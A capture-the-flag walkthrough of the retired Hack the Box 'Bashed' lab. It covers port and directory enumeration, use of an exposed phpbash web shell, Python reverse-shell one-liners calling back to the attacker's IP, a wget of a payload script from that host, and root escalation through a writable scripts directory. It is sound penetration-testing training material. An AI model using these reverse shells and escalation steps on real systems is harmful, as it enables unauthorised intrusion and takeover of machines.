Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.
Now, as always let’s begin our hacking with the port enumeration.
C:\Users\jacco>nmap -sC -sV 10.10.10.68 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time Nmap scan report for 10.10.10.68 Host is up (0.030s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
Knowing port 80 is open on the victim’s network we preferred to explore his IP in the browser and the following image opened as shown below.
Next, we use wfuzz to enumerate the directories and found some important directories such as /dev
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.68/FUZZ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt" 000002: C=200 161 L 397 W 7745 Ch "#" 000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher" 000018: C=404 9 L 32 W 279 Ch "2006" 000019: C=404 9 L 32 W 279 Ch "news" 000013: C=200 161 L 397 W 7745 Ch "#" 000014: C=200 161 L 397 W 7745 Ch "" 000015: C=404 9 L 32 W 280 Ch "index" 000016: C=301 9 L 28 W 311 Ch "images" 000017: C=404 9 L 32 W 283 Ch "download" 000020: C=404 9 L 32 W 280 Ch "crack" 000021: C=404 9 L 32 W 281 Ch "serial" 000022: C=404 9 L 32 W 280 Ch "warez" 000023: C=404 9 L 32 W 279 Ch "full" 000030: C=404 9 L 32 W 277 Ch "11" Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.68/FUZZ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt" 000002: C=200 161 L 397 W 7745 Ch "#" 000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher" 000013: C=200 161 L 397 W 7745 Ch "#" 000016: C=301 9 L 28 W 311 Ch "images" 000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts" 000014: C=200 161 L 397 W 7745 Ch "" 000164: C=301 9 L 28 W 312 Ch "uploads" 000338: C=301 9 L 28 W 308 Ch "php" 000550: C=301 9 L 28 W 308 Ch "css" 000834: C=301 9 L 28 W 308 Ch "dev" 000953: C=301 9 L 28 W 307 Ch "js" 002771: C=301 9 L 28 W 310 Ch "fonts" 044769: C= Finishing pending requests...
So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.
It will redirect to the following page as shown below, which seems like a shell interacting through the browser.
After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.
we execute the following command in phpbash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'
puckshell.py 100%[===================>] 213 --.-KB/s in 0s
2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 3 09:43 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 213 Apr 3 09:43 puckshell.py
-rw-r--r-- 1 scriptmanager scriptmanager 0 Apr 2 08:50 test.py
-rw-r--r-- 1 scriptmanager scriptmanager 58 Apr 2 08:50 test.py.bak
-rw-r--r-- 1 root root 12 Apr 2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$
catch it
C:\Users\jacco>nc -lvp 53 listening on [any] 53 ... 10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA /bin/sh: 0: can't access tty; job control turned off # whoami root # cat /root/root.txt cc4*****8e2 #
Author: Jacco Straathof